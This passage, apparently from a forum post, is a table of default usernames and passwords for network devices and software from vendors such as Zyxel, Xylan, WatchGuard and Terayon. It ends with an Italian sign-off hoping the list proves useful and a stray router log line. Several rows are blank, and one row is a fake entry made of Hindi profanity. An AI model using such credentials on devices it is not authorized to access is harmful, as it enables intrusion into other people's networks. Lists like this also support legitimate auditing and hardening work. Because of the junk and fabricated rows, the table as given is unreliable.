Tekelec 	Eagle STP 	- 	eagle 	eagle
Telebit 	netblazer 3.* 	- 	setup/snmp 	setup/nopasswd
Terayon 	TeraLink Getaway 	- 	admin 	password
Terayon 	TeraLink 1000 Controller 	- 	admin 	password
Terayon 	TeraLink 1000 Controller 	- 	user 	password
Terayon 	TeraLink Getaway 	- 	user 	password
terayon 	- 	6.29 	admin 	nms
Terrayon 	- 	- 	- 	-
Titbas 	- 	SCO 	haasadm 	lucy99
TopLayer 	AppSwitch 2500 	Any 	siteadmin 	toplayer
Toshiba 	TR-650 	V2.01.00 	admin 	tr650
toshiba 	480cdt 	- 	- 	-
toshiba 	- 	- 	- 	-
TrendMicro 	ISVW (VirusWall) 	any 	admin 	admin
Trintech 	eAcquirer App/Data Servers 	- 	t3admin 	Trintech
Ullu ka pattha 	Gand mara 	Gandoo 	Bhosda 	Lund
USR 	TOTALswitch 	Any 	none 	amber
Vina Technologies 	ConnectReach 	3.6.2 	(none) 	(none)
voy 	- 	- 	- 	-
WatchGuard 	FireBox 	3-4.6 	- 	wg (touch password)
Webmin 	Webmin 	Any Unix/Lin 	admin 	-
Webramp 	410i etc... 	- 	wradmin 	trancell
Win2000 	Quick Time 4.0 	Englisch 	- 	-
Windows 98 se 	98 se 	- 	- 	-
Wireless Inc. 	WaveNet 2458 	n/a 	root 	rootpass
Xylan 	Omnistack 1032CF 	3.2.8 	admin 	password
Xylan 	Omnistack 4024 	3.4.9 	admin 	password
Xylan 	Omniswitch 	3.1.8 	admin 	switch
xyplex 	mx-16xx 	- 	setpriv 	system
Zyxel 	ISDN-Router Prestige 1000 	- 	- 	1234
zyxel 	prestige 300 series 	zynos 2.* 	- 	1234
Zyxel 	ISDN Router Prestige 100IH 	- 	- 	1234
Zyxel 	prestige 300 series 	any 	- 	-
Zyxel 	prestige 600 series 	any 	- 	-
ZYXEL 	641 ADSL 	- 	- 	1234
Zyxel 	prestige 128 modem-router 	any 	- 	1234
Zyxel 	ISDN-Router Prestige 1000 	- 	- 	-
Zyxel 	ISDN-Router Prestige 1000 	- 	- 	-

Spero siano utili a qualcuno


LOG

Nov/02/2006 15:38:05 Wireless PC connected 00-11-24-22-A9-AE